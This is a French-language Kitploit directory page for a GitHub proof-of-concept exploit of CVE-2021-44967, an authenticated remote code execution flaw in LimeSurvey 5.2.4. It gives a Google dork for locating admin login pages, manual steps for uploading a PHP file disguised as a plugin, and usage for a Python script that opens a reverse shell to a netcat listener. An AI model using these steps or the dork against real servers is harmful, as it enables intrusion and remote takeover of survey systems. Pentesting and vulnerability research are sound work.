Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2021-44967 — POC exploit for CVE-2021-44967 | Kitploit
Outils/GitHubGitHub/d3ext/cve-2021-44967
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Tool
GitHubd3ext/cve-2021-44967

CVE-2021-44967

POC exploit for CVE-2021-44967

Voir le dépôt
6il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2021-44967

root@kitploit:~
# Exploit Title: LimeSurvey 5.2.4 - Exécution de code à distance authentifiée (RCE)
# Google Dork: inurl:limesurvey/index.php/admin/authentication/sa/login
# Date: 05/12/2021
# Découvert par: Y1LD1R1M
# Auteur de l'exploit: D3Ext
# Page d'accueil du fournisseur: https://www.limesurvey.org/
# Lien du logiciel: https://download.limesurvey.org/latest-stable-release/limesurvey5.2.4+211129.zip
# Version: 5.2.x
# Testé sur: Kali Linux 2025
# CVE: CVE-2021-44967

Explication

Une vulnérabilité d'exécution de code à distance (RCE) existe dans LimeSurvey 5.2.4 via la fonction de téléchargement et d'installation de plugins, qui pourrait permettre à un utilisateur malveillant distant de télécharger un fichier de code PHP arbitraire.

Voici les étapes à suivre pour exploiter manuellement cette vulnérabilité :

  1. Créez un ZIP contenant le fichier PHP et le fichier de configuration
  2. Connectez-vous à LimeSurvey
  3. Allez dans Configuration -> Plugins -> Télécharger et installer
  4. Téléchargez votre fichier ZIP
  5. Installez-le
  6. Enfin, activez votre plugin
  7. Ensuite, votre code PHP devrait être accessible sous /upload/plugins/<plugin_name>/<php_file>

Utilisation

root@kitploit:~
usage: CVE-2021-44967.py [-h] --url URL --user USER --password PASSWORD --lhost LHOST --lport LPORT [--verbose]

CVE-2021-44967 - RCE authentifié LimeSurvey

options:
  -h, --help           afficher ce message d'aide et quitter
  --url URL            URL de la racine web de LimeSurvey
  --user USER          nom d'utilisateur pour se connecter
  --password PASSWORD  mot de passe de l'utilisateur
  --lhost LHOST        hôte local pour recevoir le shell inverse
  --lport LPORT        port local pour recevoir le shell inverse
  --verbose            activer le mode verbeux

Démarrez un écouteur netcat puis exécutez l'exploit comme ceci :

root@kitploit:~
python3 --url <URL> --user <username> --password <password> --lhost <local host> --lport <local port>

Démo

Références

root@kitploit:~
https://github.com/Y1LD1R1M-1337/Limesurvey-RCE
https://www.exploit-db.com/exploits/50573
https://github.com/p0dalirius/LimeSurvey-webshell-plugin
https://ine.com/blog/cve-2021-44967-limesurvey-rce
https://pentest-tools.com/vulnerabilities-exploits/limesurvey-524-rce-vulnerability_13029

Licence

Ce projet est sous licence MIT

Copyright © 2025, D3Ext

Télécharger l’outil